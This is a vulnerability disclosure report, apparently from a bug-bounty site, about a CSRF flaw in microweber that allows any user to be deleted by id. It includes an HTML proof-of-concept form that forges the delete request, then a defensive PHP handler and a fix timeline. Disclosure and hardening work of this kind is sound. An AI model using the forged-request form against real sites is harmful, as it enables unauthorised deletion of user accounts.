Cross-Site Request Forgery (CSRF) in microweber/microweber


Reported on

Sep 9th 2021

✍️ Description

An attacker is able to delete any user, provided they know the value of that user's id parameter.

🕵️‍♂️ Proof of Concept

After running PoC.html, you will see that the user with id 3 has been deleted.

  <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="id" value="3" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  </html>

💥 Impact

A user with id 3 is deleted through a CSRF attack: the deletion request carries no CSRF token, so a page under the attacker's control can submit it on behalf of a logged-in administrator.
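As an added example that is not part of the original report and not microweber's code, the following PHP delete-user handler shows the two checks the forged form above would fail: it honours a `_method` override only on a real POST (the PoC carries `_method` as a hidden form field), and it rejects any request whose CSRF token does not match the one held in the session. The function names, the `_token` field name and the deletion callback are assumptions.

```php
<?php
// Added example, not microweber's code. Assumes PHP 7.3+, a session-backed token
// rendered into legitimate forms as `_token`, and a caller-supplied deletion callback.

session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one token per session; legitimate forms embed it as a hidden field.
function csrfToken(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Honour the `_method` override only when the real request is a POST, so a
// GET-submitted form, link or image load can never become a state change.
function effectiveMethod(string $realMethod, array $body): string {
    if ($realMethod === 'POST' && isset($body['_method'])) {
        return strtoupper((string) $body['_method']);
    }
    return $realMethod;
}

// True only when the submitted token matches the session token. hash_equals()
// compares in constant time, so a mismatch leaks nothing about the token.
function csrfTokenValid(array $body): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given = (string) ($body['_token'] ?? '');
    return $expected !== '' && hash_equals($expected, $given);
}

// Returns the HTTP status the handler would send. A cross-site form cannot
// read the victim's session token, so it is rejected before the id is used.
function handleDeleteUser(string $realMethod, array $body, callable $deleteUser): int {
    $method = effectiveMethod($realMethod, $body);
    if ($method !== 'POST' && $method !== 'DELETE') {
        return 405;
    }
    if (!csrfTokenValid($body)) {
        return 403;
    }
    $id = filter_var($body['id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false) {
        return 400;
    }
    $deleteUser($id); // the application's own routine, after its authorization check
    return 200;
}
```

To wire it into a real request, pass `$_SERVER['REQUEST_METHOD']`, `$_POST` and the application's deletion function to `handleDeleteUser()` and send the returned status with `http_response_code()`; the `SameSite=Lax` cookie attribute is defence in depth only and does not replace the token check.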

We have contacted a member of the microweber team and are waiting to hear back 2 years ago
Peter Ivanov marked this as fixed with commit 5383c2 2 years ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE